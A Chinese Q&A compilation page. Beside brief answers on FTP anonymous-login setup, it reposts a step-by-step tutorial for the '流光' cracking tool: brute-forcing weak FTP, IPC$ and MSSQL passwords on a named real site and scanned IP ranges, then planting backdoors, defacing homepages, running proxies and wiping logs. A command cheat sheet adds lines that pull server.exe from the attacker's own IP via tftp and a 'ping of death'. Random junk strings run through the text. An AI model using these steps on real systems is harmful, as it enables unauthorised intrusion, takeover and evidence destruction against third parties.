⑴ 配置IIS中的FTP伺服器:什麼是匿名登錄如何設置FTP目錄 FTP伺服器的文件讀寫許可權如何設定各種許可權各
匿名登錄是指在用戶訪問FTP站點時不需要提供賬號和密碼,輸入地址即可訪問。在新建FTP站點時,就有設置許可權的選項,如寫入、瀏覽等,詳細的文件讀寫許可權在IIS上好像只能對文件夾安全設置,另外一個軟體叫做Server-u的,可以設置詳細的操作許可權。
⑵ 請問流光怎麼用
流光教程
流光教程一 ON,Z$G*^ m*U
許多新人在用流光的時候不知道如何下手,小榕論壇來討論的也多是「如何添加用戶」這樣的初級問題 :),就抽了點時間寫這個簡單的教程,希望讓新手快速入門。 $Xn3l E&e M'fl7I
h4r3|)V"S&y
我個人認為流光的破解可分為5大部分: #?c"J4l'uL;Mum
nZX'vd;E3D4{+A6g 一、POP3/FTP/…探測
Y D Z"Aw9e
N z*l6A8nuxjAZ 二、IPC探測
+v8} ]2i X r3{V ~7cNNZi:W2u
三、sql探測
0b*[1x8g'U #}??}8Hx8O
四、高級掃描 4v`I'\ D\Z
?\)r+x!e-q)j bf
五、其它 … 9FZ%J-tE6c(}+N8v
Q H^@4VX'p 因為開發時間的原因,上面的探測模式略有不同,所以分成了四個部分,本教程說的是第一個部分的探測。後面的探測模式應該屬於流光的高級應用了:) Z:X%?#a+y A&V
6JO v+] f9jS,m x 下面我就簡單說一下基本的破解流程: $~S @O%r2D
z|+|)qsq BC 1、你得有流光,我這里試驗用的是流光2001.FOR Win98 中文版.FOR Win2000的也可以。 nQ4]v-Az9NCD*_7G
Q a:x7c.Kf4u 首次啟動流光,看到如下圖的界面: :x2jWr0nJ+x
"d)zkP!\ h$a ]|&Q0uro
X-U9[zO"k;M
首次使用是要注冊的,不過不要想到花錢:),小榕只是想看看有多少人用他的流光而已。你可以填好相應的選項,然後點發送即可,如果發送失敗,你把發送伺服器換個就好了。
1Dy*^7CM4y4jj7BA )[sRpa7_/w
S;X j@_H
E+U4xtR:@5EYt/CJ)}
因為重裝系統,我也不知道我發了多少次了 :( 。如果不想注冊,就稍等下面的進度條走完,點稍後即可。如上圖:
y\Bs9Np9~9f%Ol`9F F5OGX-X?3c@U9L
tN;FQDgH-x -s(Z5w5FEr@p[
H9ed$^"N[*P"X .A$}Vtx6q2sJ
2、找個站點,我選的是中華網[url]www.china.com[/url]的主頁空間(home4u.china.com),探測方式:FTP。
N |B^Fk4Y +I V+X lf
有人常問掃描埠有什麼用,其實作用就是你知道他提供了什麼服務,然後可以採取相應的探測方式來獲得PASS了:)我們知道主頁幾乎都用的FTP上傳,我們這次就用來測試一堆用戶名,看看有沒有弱智的密碼,呵呵,如果有 hacker.at.china.com 這樣的,也不妨霸佔為己有:)
4n9N OnqZkd
7W NmEQ5ZHw 3、加入要破解的站點名稱:右鍵單擊FTP主機→編輯→添加→輸入 home4u.china.com →確定! \:] B E'MGw
mZy9yF:qpE8K eJ5L!I a#C4I1O*w
yU&CX#X$x,r
CrN Ap
!zS,@}0m/P,V7} 4、加入用戶名:我們要破解的是一堆用戶名,所以要加入用戶名的列表文件!我們就加入流光目錄下的 Name.dic :)右鍵單擊剛才添加的主機:home4u.china.com → 編輯 → 從列表中添加 → Name.dic → 打開
;g$d.k H-W 5itXRHu%?8G
7_bvg'fU
C&@2H W,]S NO%yOw-Y.\*E x hJkB6l
1l;v0{`!~d+e%hU u
然後會有「用戶已存在列表中」的提示,我們選中「不再提示」 → 確定 。如下圖: 6A ~:uu X3eh
$G7Z%~ nw
wVF5^tB#yT#k%Nf7c
CkjR-X[_@-b 用戶名太多,我們可以用點主機前面的「—」號把用戶列表縮起來,如下圖:
+l3^8TC0R3Ml
7Q,FP oe`"[mk Z-m1x^kB8j$Ej]
!V8WoCEr
大家注意名字前面的小框中必須有√要是沒有就無法探測了。 Xcj)[ PR
\JL,X5W Cv Lv o3G
5、有了用戶名,我們就可以進行探測了,大家會想到怎麼不用密碼?其實流光有個簡單模式的探測,也就是用內置的密碼」:「123456」和「用戶名」來進行探測,因為這樣的密碼是使用頻率最高的:) 9r)?e b;M4Y5y#pixy
{M JrO#j@Hmg_ 當然你可以修改這個簡單模式的文件,加入你認為弱智的密碼。方法是:單擊 工具菜單 → 模式文件設定 → 簡單模式探測設置文件 → 加入你要加入的密碼 → 把設置文件存檔! OQhI^,O
F Q_~.k ODI 下面我們就來看看這一堆名字裡面有多少是用「123456」和「自己名字」來作為密碼的。
}S~5M{)E
EbUz RqHZ 探測 → 簡單模式探測!
u$b'n(jR,Ik0h@
b(P*|@-s,U!P;uO.{ hm.T2l*t},|
T ]q&I2q~
3F_(W(C j?\
M s+q O3L$s 探測中…
:fJ+A;T@S}&u
y+g.Bl C-_6x"U@X+M1]B
$k.S*q!g.] X
K]e/y^Ii
:]^YE/A$fB#W
1M+]t+eW QAM 6、探測完畢,也看到結果了,流光會問我們是否查看入侵檢測報告,不想看可以選否。
*sQ!cR:C'oms
;w I`&x+y
|I)vh7?xc|
;Hga+B5r:vt#Je 報告的畫面
2z)S"nS @l4~#VM
ydx!w*O b| {?Cb1ZDZ
\.i c`h xc 7、如果要探測的是一個用戶名,就需要添加字典、或者密碼方案。方法是:右鍵單擊解碼字典或方案 → 編輯 → 添加 → 選擇一個密碼檔即可。 ]}E5? J l/@
J$``IO#R3i 以上就是流光的一次簡單的探測了,事實上這些功能只能算是流光的2.5版的功能,流光2001增加的IPC/SQL/高級掃描等功能,使流光更加強大。如果你對這個已經很熟悉了,相信你看流光的HELP就會很快的學會其它的使用方法的。
9\W i R-JUV j {L k/X |
關於用戶名的問題:有人覺得自己加入的用戶名不一定存在,如果不存在豈不是白費了力氣?這點你大可以放心,流光會進行驗證的。而且現在注冊的用戶入數之多,想個沒有的名字都難,不信你隨便敲個試試。
Vi~PLWdY UYk5@Ou
關於字典的問題:流光可以使用字典方案來探測,當然你也可以生成字典,有的新手在作練習的時候不知道怎麼做,你也可以用記事本生成,每行輸入一個密碼,存檔後將擴展名改稱.DIC,流光就認出來了:)如果你連擴展名都不會改 :( 那……
wp-w7J"Ga)\af+p
L/\Di/`@y X#c
2a2H~/f9W[,L o r @m F ~
只要是學習、誰都會遇到困難,我也是問題多多,還得向小榕、EKIN討教,歡迎大家多交流 :)
]J+|3{,mJ-k#j!M
0W H%X$sp/@ a
u3I4L%S9n btd
P#m)Zqs
`1_s"W)BD :c"{n_&r]
待續……
香煙 2007-5-28 11:07
流光教程二
很長時間也沒有寫什麼東西了,這源於我的懶惰和生活缺乏激情。我的記事本上一大篇都是欠朋友的承諾 :(
l P8M"F5M:b2|0k !J:Ix~R h
你既然看到這兒了,就在聽我牢騷幾句吧:)搞安全應該有正確的心態,別以為你會了個工具使用就可以一步登天。
{B \[y0x\/u 'a+g a S)tUc
交流、學習才是最重要的,把自己心態放正,無論我們是高還是低。
R p4O)Z'qT#L n.Wxu3Zk0x
5F i GX!xJL+Z#`dN
今天要寫的是流光的IPC探測: \,`;P_`?
Ev b n+jq 一、目的和任務: +@&g2Bs/dp+i
M UA0P@ O;t pu!?DP
1、用流光的IPC探測獲得一台NT主機的管理許可權,並將這台主機做成一個跳板/代理。
V |nnP;_gTX] 2、學習IPC探測的相關知識。
!gnaW4v,Ft9~ 4X-R0J'U:\ |td
二、探測流程:
E],@9y/b Bm#a~ S8HD#?%X
1、你得有流光,我這里試驗用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因為IPC連接功能是NT/
X.Q#mG"Vj^S }+T!J (U:s,o|P1F\I2p
2000提供的功能。而且流光FOR 2K 要求你的操作系統得是NT/2000,否則流光啟動會失敗!
+DfdoX;})J (~\Q.` v \&|7\3o
什麼是IPC:
l2E6WK0@4b^
d,d-Txkrx!miLM IPC是指"InterProcess Communications",准確的說是ipc$,是默認的在系統啟動時的admin共享。 .p gsh Y_E
S#M+Y+c^+\_|
IPC$是Windows NT/2K中特有的遠程網路登陸功能,它的特點是在同一時間內,兩個IP之間只允許建立一個連接。 (nV6s7f4k
RE u*@!T 注意,你試圖通過IPC$連接會在EventLog中留下記錄。不管你是否登錄成功。 g/?"o[;We AvE w
2\"D,R+t6u;z $s e5mP6@^5v7t
:s#n8[q4rA g
可不可以通過IPC$暴力破解密碼?當然可以 ! 不過,是不是太笨了點 …
#p"U`9F9v8lv,P
xK8X$rAm k{8K*G7q5R
2、首次啟動流光,會看到注冊的畫面,具體操作請參考本人第一篇教程。我們在主頁面上可以有幾種方法來通過IPC
sI)[at
M9ly3t p 探測獲得管理的許可權。這里我們要作的是得到一台跳板,那麼就可以用命中率高的辦法來探測了(測試一堆IP來得 A:q6EkB5_v
nLa5Q*pxL
到弱口令)。
"S[;hr4]W)@
9Q$?5X4w(a 在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項,或者直接按Ctrl+R。
u ~ ]` W6C 圖main1 4H%SmP u3`-g
7\0v7S7S^ue
+k.h]7}vr4A*| "B^;XKZ0L;R"_-H
圖main2 Qmm _ Lh7GV
-XCq2S~ cQ
EG"miTgi+u
6N5_Vp!Y0@ws0r,E 3、出先了上面的小窗口,輸入我們要破解的IP段,我們輸入了來看看。圖main2我們把「將FrontPage主機自動加入HTTP主機列表取消了」。因為我們只想獲得IPC弱口令,這樣可以加快掃描的速度 :)填入IP,選擇掃描NT/98主機 k3P.gQ$p
.ZA F#w X 4、探測中…… (start1) %_,sn#G;q3Y`
!Gv?@G;t0|1t_D
(注意如果你要探測的是流光保留的國內的IP段,會被禁止的,也就是探測的時候信息欄出現"IP保留"的字樣) 6rb2ZLn9n'?3F
M.KoJ2c
!dnP6me;D%C iCBt)hvs!bm)v
6e(JmneR 5、這是掃描到的NT/98主機列表:(jg1) 9yd R9V @c E G
4z zC1Kn9GOP ?
1sa _W Om9l
'U0x?U mk ^2G5j
6、沒有掃描到常用密碼:(
2\"r'i'kA&n;o 6KgORI"y t}-T$J
HfegS j c,o9v*LQ)K:F
7、就不要查看報告了 :… &e2N(Ki,t \&WM@FO
} z'p-S%yYu4W
WU9g._w/S5A
\:kr_8_7gA)A 8、有了不少NT/98的機器了,正式開始IPC$探測:IPC$主機-探測-探測所有IPC$用戶列表。 $P8E]3\9B K2pg
AP#[(N W5P4Y
%n)T h9qO&[k"U3y P Xe
)g2tM"l-^)A.s8N} 9、注意下面兩個對話框的設置:全選上,我們只要IPC$管理員的弱口令。然後點選項
Y i:~C{DP Nzy _x3wxL
(C0M4X W@vO
"mx-?qz]%n4z 10、點「選項」 :為了加快弱口令掃描速度,這里的兩個我們可以全部取消,比如下面的那個,如果對方禁止列出用戶了,我想對於一個網管來說,弱口令可能性也是微乎其微。 T1@+Z\q _'xbU
3U+n)L1?1ZHE0E
?]*\9K5\6{4o2{3a l8_W
-~K+d6^]%w mg x1_fw[
11、探測中……
L|9Wl/`9i!w
iX5~o5y"E C+@ /l8f#OxW:@Q
FL?HKg/vQ
12、有密碼了:) vh3tv/zll,p
xm;{Z r+L3{~"k
y1pg2x l z:P l(f6y2[2vSY;K,]
13、又出現了查看報告的窗口,看看 :)
#Y0U fH M@,@Tf x
@^%Z0v(t [| 9m-`)X-P(Q#o,I
C8E [,F W
14、有遠程主機的管理密碼了,我們剩下的就是想辦法控制它了,有什麼好辦法么? :)有的是 !自己看看工具- i:h0{(AGCO5O
H.j+f!X;Fp8o 菜單下的IIS遠程命令:)是不是很簡單呢,我以後在說,今天還是先練習net 命令吧。
}6Pb \+u W#C %V%`*@$m*u"pH&P
15、黑了他 !
w2K#cu"e}
@2]*w5d.Y+V'D8bB 開個dos prompt 執行如下命令,本次用的例子如下圖。
1v'kePX4a-r
)z9N,s5hb-AaH_ 1、 net use file://對方ip/ipc$ "密碼" /user:"用戶名" || 建立遠程連接
6sBdD1z3l p#T(o_p5ve+PSqC
2、 icmd.exe file://對方ip/admin$ || admin$是對方的winnt目錄 :) 這里文件多。
*Q1T*l,e"K%_/E
-Pr:z%mOn/L 3、 net time file://對方IP/ || 看看對方的本地時間
{7J{ H.|:f!oy Q\M
R g;Yi}x+tO1j&_ 4、at file://對方ip/ 啟動程序的時間 啟動程序名 啟動程序的參數 || 用at命令來定時啟動程序,在這里我們用soon這個程序來做也可以,它可以取代 3/4兩步。
Luw UB @)L2~fy S0@lz
5、 telnet 對方ip 埠 || 1Q&LR1Z3W/h }
{K9x J4s-U(K%C-_*c
6、輸入pass (如果不是用icmd.exe,或者沒有設置口令就不用了) ||
8Hv3k?)um1o@~`[ QF@G~%gZ8jF
7、在開個窗口,繼續 我們用的東西。 sock.exe ntlm.exe cl.exe clear.exe 1p"?+X1LN$K~4k
za1\5E[:?:j5f
圖cmd1
-MRgW,~F/cx
q\&Vh |,P #o&n8N/R` l%RB
9O2i,ZZ ~/~,b kA%c4f-h!v Q 圖cmd2
Nl#I\*s E V
Ui HR"C%X
;L;\#~A-g])_$o
Z(G;iiC 如果我們真的想黑了他,只需要把我們的首頁文件覆蓋目標的首頁就ok了,我們可以通過dir /s default.htm或者dir /s index.htm 來確定對方首頁的為止,一般是在X:\interpub\wwwroot\ .
%\YUsC5z2th2w j2WwPs*C:@
假如首頁文件是default.htm並且在c:\interpub\wwwroot,這樣: default.htm \\ip\c$\interpub\wwwroot n{*{]4W0F4W#M
_s8c8P\B K
下面的圖有演示 t2~5l:i'v,j
.T'l!h)XGK_-FN^ 7、其實黑人家是很低級並且沒意思的:(,我們最好是物有所有,作成跳板吧,今後幹活方便點:) /S.S,_? ^"L-y
F&D(HL ^ 執行我們 過去的ntlm.exe ,取消驗正。在給自己留個後門,比如提升guest的許可權,或者其它的後門工具,這類東西多了自己選吧,看看殺手的那堆東西 :)
Gk,Q@ X"n\m us E
} ^\W(a G V,S
Y1aU j9t ^/n[7K
6Z`!q!Dx-W\ 8、做個SOCK5代理玩玩,用在QQ上不錯喔: cq&Q `k+h8m
1G1}lX'S(F
執行我們 過去的sock -install,net start skserver 看看用在QQ上的效果:)
1C.P7F6?"mY
[7D&n&l|@
*b wh ?}1O/SW
0s(r2G:K9_A\kB/iw 是不是沒有看清上面的步驟呢? \$u1Ll]qJ,\Q(e
1QG2S/zq4_0DK wN 下面是我telnet 上去後所有的命令:)
M)M k|.Z $me*bZRZr
0c0Zw8X7}I
$pF g1^.A 9、還能做成其他的么 ? yLP4s#w"\5i4|
/}2}H6h!jc/|o;A
當然了,只要你有時間,並且願意做,我曾經偷偷的把自己的主頁放到人家的server上,速度快、空間無限,嘿嘿 :)
A&b!W2`My^#v
5Lj} O`qG 10、日誌清除,斷開連接 : dB#Va F~w f
"x)Op(r[`9D
執行我們 過去的cl.exe clear.exe 都可以清除日誌,比如clear all :清除所有的日誌。然後在斷開連接:net use file://ip/ipc$ /delete
FNwL3v
4J$lx'Xztp 這步我認為是必需的,尤其是在一些有爭議的站點上,或者是國內的站點,除非你想讓電視上報導XXX地區我神勇刑警捕獲弱智黑客一名XXX。 'rKIh8G V(V
$F&tj+\W6f
在網吧寫完 :( 錯誤之處請賜教。 ,f^#B#yg3u J#q
&u;Y/q~3hN A~ 只要是學習、誰都會遇到困難,我也是問題多多,還得向小榕、EKIN討教,歡迎大家多交流 :)
香煙 2007-5-28 11:08
流光教程三
關於IPC$的終於寫完了,那個該死的網吧,鬧哄哄的聲音聲聲入耳 :(,你可能想不出,IPC$探測是我在網吧完成的,而且那個網吧還有公安部門的網路監視器,這東西很有意思,好像是VXD調用,和IE運行庫集成到一起的。哪天非弄來研究一下,說不定一款別具特色的木馬就問世了 :) PY{ S+Fy!Yo
%J@2J!QlVW7u;A
不知道你看完前一個教程有沒有要扁我的想法。。。。
zv'y;w,\!msU
R7dr8gLWpd 交流、學習才是最重要的,把自己心態放正,無論我們是高還是低。 jN;d|C c%|]
\#O"o7Nd
+ER[ x`v'r 今天要寫的是流光的SQL探測,順便說說ipc$補遺和其它的探測手段。
sI!\~*F3~
hmw.N Eer-Ca+t 一、目的和任務: 1Z%CUh!v:@i DZ
/]a E)Z4G#].e
1、用流光的SQL探測獲得一台NT主機的管理許可權。 dU/[-d9JI'k
2、學習SQL探測的相關知識。
^q$f5F k o;d qJ 3、IPC$補遺和其它…
$n j6n$V yl 二、探測流程: ,y?8gzw)l
,F7ajG@:[ 1、你得有流光,這話不用在說了吧:) rcHF&O4w|C
Ny|f\X
什麼是SQL:
2?Ek\+Z0G"E \;f"n0Y0? x+F^]6~ H9r
SQL:微軟開發的資料庫,專門用在微軟的OS上,功能類似Linux 下的Mysql,暈……,到底誰類似誰啊?有時間
7K$e.k Jbp (wi4PW6s9pU8e/C*H
去看看SQL的聯機手冊,說的很明白。
&W8A4of)?)t)U
'?c3QW@.k#Dh@*Ll SQL服務程序支持的網路協議: Nl*`yf ?
.G0y)?F,R$`rH Named pipes :使用NT SMB埠來進行通信,存在被SNIFFER截獲數據的危險。
YB5I7`ME E9v4D
-If}ru \ IP Sockets :默認狀態下開1433埠,可以被掃描器探測,存在被SNIFFER截獲數據的危險。
:b3L{~-S Xl6}E!]2c o3C]
Multi-Protocol :客戶端需要支持NT RPCs,數據加密。 4T7f3e?{1`[a
JJq(S:o9`\,nk
NWLink :存在被SNIFFER截獲數據的危險。 5{/AhH3_F jv*LM
%^3qxM8h:\qZ `W!y!m
AppleTalk (ADSP):存在被SNIFFER截獲數據的危險 v"t3N"e DZx
7y3r KD UkGZW@ Banyan Vines :存在被SNIFFER截獲數據的危險 :t k6Z7RZ;W~
Bkh{3_/y9k7D p
在Internet上,95%以上的SQL Server 採用的都是IP Sockets協議,流光探測的就是這個協議默認的1433埠
;MA'vxIjn.L"V7E
([Z8u)b[1N)l[xjf
vI'Go'}dF E q.j 2、我們要獲得SQL 主機的管理許可權,那麼還用命中率高的辦法來探測了(測試一堆IP來得到弱口令)。
Hz W2VB"Pq
.~8U6@/\?H:{ 對一台固定主機的探測等我下期的教程:) WUTp!~-M:K
s)XZh4Lz
在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項,或者直接按Ctrl+R。 ~F)_2mc1J!_2k3o T%@
圖main g;S:]_4M$^
)[MQp j
V_0@sF~
$yX0tZ;TX'l(u(b
I0i)Q2cu2iv/ul
3、出先了下面的小窗口,輸入我們要破解的IP段,我們輸入了來看看。(注意如果你要探測的是流光保留的國內的IP段,會被禁止的,也就是探測的時候信息欄出現「地址保留的信息」)
iO~/qo|p4\ 圖inputip
@,l6S/mi6p ,S4^XK-rb
W7i}tF,?` H B j1jWF:~|;MV
%{]-Y;`(wR-[cn 4、探測中……
5hB-u.aXGA Xb
bm!hl]-Kn|1F5B 5、有密碼了:) 圖psss 1→3 &I*Xett-^ wY+d:N(Q
`,Te`#p` yc2EJ*i7x%|Qu'e
t:` V9^]
Ee+x-va;W ]F
6uR8p)Crk5\7?
aH0cgLClEGp9I
*{(S&hN:n
2H]6I3xJ4V | ip#^/H] My-I g7Z
6、下面我們進一部獲取管理員的許可權。 4b.RQK4L
用SQL 客戶端去連接主機,沒有裝SQL :( ……………… 沒關系,流光自帶了連接的工具,以前我一直都是用的天行的工具SQLexec,但現在可以不用它了。 A d-i9MC3O!oZ1g
R`s AB$u@A
打開菜單 工具 → MSSQL工具 → SQL遠程命令看看:) f8jZ]/J
圖tools
| q^%g{$H|8p6~
D~ fE/Yj'Hyy G4k#X,br(h
+sjL t+N ]j 圖SQLcmd 7`;^3d4Kd&Wt\4ir2a
@0|#Zh*I`"U
2^M*O8rLD
zL$n*Gl 4nsB*l+?X
7、獲得管理許可權、增加後門
s+Ex MD&zj*y(N 圖cmdline 6R^ {.HtkOe g
5x%G7L_ z;LM A
L0Y?2b:sy
8HNh#wk.f
0f-}8s(Z%Q gO
{9Rhd aD 8、現在我們已經是管理員了:)
3l"eM1G(e.?(U { y.M tn
以前我們是用at命令來遠程運行程序,今天順便說說流光中自帶的「種植者」,看看 工具 → nt/iis工具 → 種植者,我們來用它遠程啟動icmd這個後門。 xW9{5d lp
4o@7Fi.O5Mt{
圖lookcrop 5q l.c.nM6k
&H V} g.e}_O
oS8D'l&L
l e9G1a~(wy
圖crop &V8XM;u }\0t%_Sd
{j qEC#?Lc/W
)\$_;k,u-K
H(P1e)G;a7E 圖cropend d'VHG6@yu
m*XX6A$b N fe3A9u%B]Sk
-VLFBb*N 一分鍾後登陸看看:
2@'zrwIB.z b9f]V4V/Ys"q#gr2H
-L-e)L,m yQG1?c
@x3A)}U$I%k1mA
.Y,EMOF
6QNC4w6rs't
7O2l(X;TT;bQp
9、再說說 工具 → 模式文件設定 → ipc簡單設置文件 。
0T:s(_)^CdaQt
3}.YUYvi)g8N 圖mode U k/d&bcw'e4m
Da \[ j;^2m
8eQI H3er!\$R
H-QJ/njtF#c
#v(HkA%{,I9E
@i/V5V`u&o 「工具」中其他的項目和上面說的兩個類似,就不多說了。
:AL A"sF)g\ H2K
8{7e(z[(~0j']zF v
#Rn3O${]&K"h9v NR 10、日誌清除,斷開連接 ,參考IPC探測,記住可以用種植者遠程執行命令。
Q]d%H Q Of5b ot-m mFnM8a#Cv3A
!oSO.LF|
關於IPC$補遺:上篇對與IPC$探測的文章,寫完後覺得還差點什麼沒有說:) T)Rlz*v#@gC
b8n2^,y}"Ui1` 1、我們雖然只探測管理員(admin)的弱口令,實際上在真正攻擊中是任何一個用戶口令都不會放過嘗試的,因為我們獲得了
E:mJ O#P0M,^EAJ !aF C??5k!qh9CH
普通用戶許可權後可以提升許可權,事實上,一個普通用戶的許可權在*nix攻擊中是非常重要的。 lCkc)W@m
MN0f:GT%x
2、獲得口令後,攻擊手法多樣,不要局限於我的常式。
XJWu+Q |/U5B/Ffco
3、如果對方沒有XXX怎麼辦?,這類的問題去看看我以前整理的流光FAQ。 v!D+RH z K
'K;t{"S(a?rM
關於其它探測:
O)},m1]u A1J
]6H {0^7C$?U 玩玩3389 ? Lxk8[l8F
Dc?~'^#mQ/c3L l
首先終端是WIN2K提供的功能,所以我們在掃描的時候就要選擇 「NT/98」的主機,在得到主機列表後自定義端
4]vE0~ b/o CY
6J:XH WY{AN"qu 口來掃描這些主機的3389埠,然後……
7ED.O4CM/]NZ 8l3m-J9x'?*B
玩玩cisco路由器? Y'}L4[x-}:qt
&|7l5x\;nm 自己想想怎麼作 ?要是想出來了,我的以後的教程就不用看了 :)
4?` [wxXB"o/}~ y!GGM X}\(H:|'`
1_h(r5b"V1E3ht]%j
G6RK^XE-u 明白了么?我說的意思是要靈活使用流光:)
⑶ FTP伺服器根目錄設置為遠程共享文件夾時,怎樣設置匿名登錄
你用的是Serv-U做的FTP伺服器嗎?如果是的話可以這樣做:具體方法如下:」、打開Serv-U的配置管理界面puzb在「全局用戶」或者「域用戶」中選擇「創建cgko修改和刪除用戶帳戶」;2、在「創建,修改和刪除用戶帳戶」的界面,選擇「添加」。;3、在「用戶屬性「對話框,「用戶信息」下的用戶名為:Anonymous,密碼為空,為其指定FTP的根目錄。4、然後在「目錄訪問「選項,點擊「添加」,為其指定訪問許可權和目錄。5、最後點擊「保存」6這樣我們就成功添加了匿名用戶。
⑷ 懂電腦的幫下忙
呵呵 樓主 別說我騙點擊量 我的QQ空間里就專門寫了這樣一篇文章 但還是在這里再發一遍吧 誰讓咱厚道呢...
net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C:到本地為
H:
net use h: \\ip\c$ 登陸後映射對方C:到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其
具有管理員許可權,注意:administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加
上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況,常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip
協議使用情況)
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話,就可查看對方最近登陸的
用戶名(03前的為用戶名)-注意:參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由(數據包),參數:「-w數字」用於設
置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據,參數:「-l[空格]
數據包大小」;「-n發送數據次數」;「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之
ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,
ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝
目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具,默認是沒有安
裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除
只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏
、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文
件,「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和
文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作
用相同)
move 盤符\路徑\要移動的文件名 存放移動文件的路徑\移動後文件名 移動文件
,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件
中,"> "和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務,用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算
機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠 遠和登陸伺服器,默認埠為23
open ip 連接到IP(屬telnet登陸後的命令)
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑\文件名1 路徑\文件名2 /y 復制文件1到指定的目錄為文件2,用參數
/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe \\ip\admin$ 復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成
3st.jpg新的文件,註:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指
ASCLL格式文件
\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.* 復制對方admini$共享
下的srv.exe文件(所有文件)至本地C:
x 要復制的文件或目錄樹 目標地址\目錄名 復制文件和目錄樹,用參數/Y
將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe
登陸後,將「IP」的server.exe下載到目標主機c:\server.exe 參數:-i指以二
進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模
式)進行傳送
tftp -i 對方IP put c:\server.exe 登陸後,上傳本地c:\server.exe至主機
ftp ip 埠 用於上傳文件至伺服器或進行文件操作,默認埠為21。bin指用二
進制方式傳送(可執行文件進);默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由,將主要顯示網路地址Network addres,子網掩碼
Netmask,網關地址Gateway addres,介面地址Interface
arp 查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理
性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化(最小化)運行某程
序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件(目錄)的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔,只讀
,系統,隱藏 屬性;用+則是添加為某屬性
dir 查看文件,參數:/Q顯示文件及目錄屬系統哪個用戶,/T:C顯示文件創建時
間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和
時間,而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序,並顯示出:請按任意鍵繼續....
if 在批處理程序中執行條件處理(更多說明見if命令及變數)
goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行(標簽必須單獨一行,且以
冒號打頭,例如:「:start」標簽)
call 路徑\批處理文件名 從批處理程序中調用另一個批處理程序 (更多說明見
call /?)
for 對一組文件中的每一個文件執行某個特定命令(更多說明見for命令及變數)
echo on或off 打開或關閉echo,僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
